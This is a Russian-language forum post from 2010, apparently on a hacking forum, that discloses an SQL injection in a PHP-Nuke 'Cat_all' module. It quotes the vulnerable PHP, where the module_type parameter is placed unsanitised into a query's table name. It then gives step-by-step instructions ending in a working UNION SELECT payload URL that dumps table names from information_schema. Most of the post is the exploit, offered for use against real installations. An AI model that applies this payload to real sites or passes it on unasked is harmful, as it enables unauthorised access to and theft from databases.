Показать сообщение отдельно
Старый 26.12.2010, 12:29   #15
AFoST
 
Аватар для AFoST
 
Регистрация: 01.08.2010
Сообщений: 79
Репутация: 43
По умолчанию

Вроде, не было такого. Выкладывал в моа или роа в свое время.

sql-injection

index.php
PHP код:
function main() {
    ...
    if (!
$module_type || !isset($module_type)) {
    ...
    } else {
        
//    Подготовка модуля, сбор настроек для конкретного типа контента
        
include("prepare.php");
...
}

switch(
$func){
    default:
    
main();
    break;
    ...
    }
?> 
prepare.php
PHP код:
<?
if (!defined('MODULE_FILE')) die ("You can't access this file directly...");
//Определение настроек данного типа контента
$prepare "select welcome_text, num_def, num_main, display_type, border, part1, part2, content1, content2 from ".$prefix."_".$module_small."_".$module_type."_config";
...
?>
1. заходим на
Код HTML:
http://phpnuke/modules.php?name=[B]Cat_all[/B]
2. видим список. выбираем. открывается ссылка наподобие
Код HTML:
http://phpnuke/modules.php?name=[B]Cat_all&module_type=<туткакаятохерня>[/B]
3. имеем sql-injection
Код HTML:
http://phpnuke/modules.php?name=Cat_all&module_type=<туткакаятохерня>_config+where+1+and+1=0+union+select+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables--+-
AFoST вне форума   Ответить с цитированием